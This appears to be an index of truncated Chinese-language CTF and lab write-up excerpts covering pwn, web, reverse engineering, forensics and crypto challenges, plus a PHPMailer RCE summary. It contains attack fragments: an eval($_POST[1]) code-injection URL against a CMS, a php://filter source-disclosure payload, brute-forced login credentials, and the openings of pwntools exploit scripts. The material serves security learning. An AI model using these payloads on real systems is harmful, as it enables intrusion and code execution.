例题: ret2Syscall 查看安全策略 [*] '/root/ctf/Other/pwn/ret2syscall' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 开启了NX enabled 查看字符串和方法 未发
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t
太菜了 只会做两个简单题 不过还是从这个比赛学习到挺多东西 Ghidra使用啊 位运算啊 angr IR啊什么的 感谢出题人! Hi!Harmony! IDA7.6反编译失败 尝试使用Ghidra成功反编译 查找字符串交叉引用找到关键的加密函数 EXP: #include <stdio.h> const char table[] = "ABCDEFGHIJKL
打开网站 扫描目录 查找文件里的内容 输入vim -r /index.php.swp发现flag3 输入robots.txt 发现flag1 发现flag2
打开网站 注释里的内容 获得user.php 里面都是用户名 用bp爆破吧 爆破成功 username=lixiuyun&password=lixiuyun1990 登录网站 注释里发现内容 去掉注释,则是一个文件上传点,且注释提示文件上传点存在漏洞 上传图片马 上传各种绕过的方式都显示文件名不合法,它的限制好像
打开网站 考点:已知CMS漏洞利用 在线搜索exploit 成功利用 蚁剑连接成功 找到flag 数据库配置文件 成功连接数据库 ,获得flag payload http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])
打开网站 密码在注释里 登录成功 什么东西也没有,抓包发现response里有show字段 于是request一个show: 1 返回php代码 代码审计 <?php include 'common.php'; $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE); class db { public $where; function __wakeup(
打开网站 题目类型:文件上传 注释中提示存在文件包含漏洞,怀疑是不是审计上传代码,并利用上传漏洞上传shell脚本 上传测试 上传php失败 利用php://filter伪协议获得index.php代码 ?file=php://filter/convert.base64-encode/resource=index.php 代码审计 <?php include($_GET['
ROR 二进制位线性变换,直接上z3。(不知道为什么,python脚本被压缩去掉空格了,各位将就看图片吧。) from z3 import * box = [ 0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0
[西湖论剑2021]Yusa的秘密 Sakura组织即将进攻地球,此时你意外得到了该组织内某个成员的电脑文件,你能从中发现本次阴谋所用的关键道具吗。(注:题目中包含了五个彩蛋,且彩蛋对解题本身没有任何影响,快去发现吧!) 附件:Who_am_I.zip,Yusa-PC.raw Yusa-PC.raw是内存镜像 首先pslist .\v
希望疫情早日结束 注:打*的是赛后出的 总WP:https://wp.n03tack.top/posts/14620/ Misc soEasyCheckin base32,但有问题,倒数出现了0$,0–>O,$—>S,得到一串hex。 结果hex那里又有问题,具体是出在83¥6988ee这里 根据规律,每6个字节的第1个字节为e,然后把¥替换成e 得到社会主义核心
解决逆向的题大都需要IDA软件,没下载软件的童鞋可以去这篇博客看看: https://blog.csdn.net/re_psyche/article/details/78797689 打开可执行文件(去攻防世界REVERSE板块下载,第一题就是) 随便输入字符串,提示wrong!并且发现这个输入还是个死循环。(这点比较重要,在后面看伪代码的时
题目简介 题目给出程序 showyourflag 以及用该程序加密后的文件 yourflag。 可以通过命令行执行: showyourflag [infile] [outfile] 加密分析 字节变换 程序首先对输入文件的内容进行逐字节变换,位于函数 sub_401FC0。 v8 = ~__ROL1__(v8, 1); 子串压缩 随后实现了一个类似于压缩的
目录 一、USB协议 二、键盘流量 三、鼠标流量 四、writeup 附件题:usb流量分析 题目描述: 具体描述忘记了o(╯□╰)o 大概意思是有个U盘插到电脑上,然后经过一些操作导致该电脑重启了。找到这个过程中的flag。 附件下载: 2021-10-12T15_49_10.808949+00_00usb流量分析.zip-网络攻
比赛感受 题目质量挺不错的,不知道题目会不会上buu有机会复现一下,躺了个三等奖,发下队伍的wp Team BinX from GZHU web Checkin_Go 源码下载下来发现是go语言写的 首先需要登录,用户名密码任意填,用户名不能是admin,爆破md5,这个简单 之后审代码,存在个溢出的问题,但是只能admin能add操作,
Dream II 看题目提示的 仔细看用什么提示方式,页面进去提示了“put me a message then you can get the flag” 说明重点就是怎么把信息传过去,这里可以先测试GET POST请求会发现都不行 所以重点就是这个“PUT”这个词 所以用burpsuite 用PUT方式丢一个“message”的数据包得到
1、下载附件后,运行是一个输入程序,IDA分析main函数,gets可溢出。 F5伪代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [rsp+1h] [rbp-Fh] puts("please input"); gets(&s, argv); puts(&s); puts("ok,bye!!!"); r
手动分离压缩包注意:zip压缩包文件头格式为504B0304,之间包含504B0102,文件以504B0506****结尾,注意这类格式。 解题流程 题目是1个压缩包,还有提示:动手修复。 1.先把压缩包解压,得到图片和另个压缩包。压缩包需要密码,图片是一个只有黑棋的棋盘。 2.考虑压缩包为伪加密,改完后发现打
文章目录 001 base64 001 base64 难度系数: 1.0 题目来源: poxlove3 题目描述: 元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的
276 axb_2019_final_blindHeap 朴实而无华。 参考了大佬。 盲打一篇过 exp做了一点点调整。 from pwn import * all_commodity=1 just_one=2 context.log_level='debug' context.arch='amd64' context.log_level = "debug" # file_name=ELF("./") libc=ELF(&
281 ciscn_2019_final_6 storage game里面有个输入函数 显然有个off by null。 exp #coding:utf8 from pwn import* r = remote('node4.buuoj.cn',26021) libc = ELF('./64/libc-2.27.so') def resume(): r.sendlineafter('>','0')
漏洞概述 1.漏洞简介 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞。成功利用该漏洞后,攻击者可以远程任意代码执行。许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件,影响不可忽视。 2.漏洞影响 漏洞触发条件: PHP 没有开启 safe_mode(默认) 攻击者需要知道 Web 服务
关于php反序列化漏洞原理什么,可以看看前辈的文章: https://xz.aliyun.com/t/3674 https://chybeta.github.io/2017/06/17/浅谈php反序列化漏洞/ B站也有相关学习视频 https://search.bilibili.com/all?keyword=php反序列化 安鸾平台有两题unserialize反序列化题目: 第一题: http://w
Bugku crypto Math&English writeup 下载附件,打开后,获得如下内容: 通过计算,得到: 21 33 1 22 3 44 54 5 1 35 54 3 35 41 52 13 发现上述结果均由1,2,3,4,5 五个数字组成 推测为元音密码。 按照对照表即可得到flag。 注:{}里面为小写。
PHP代码审计 01 题目URL:http://www.whalwl.xyz:8017 提示:源代码有泄露 既然提示有源代码泄露,我们就先扫描一遍。 精选CTF专用字典: https://github.com/gh0stkey/Web-Fuzzing-Box/blob/main/Dir/Ctf.txt 推荐使用7kbscan进行扫描, https://github.com/7kbstorm/7kbscan-WebPathBru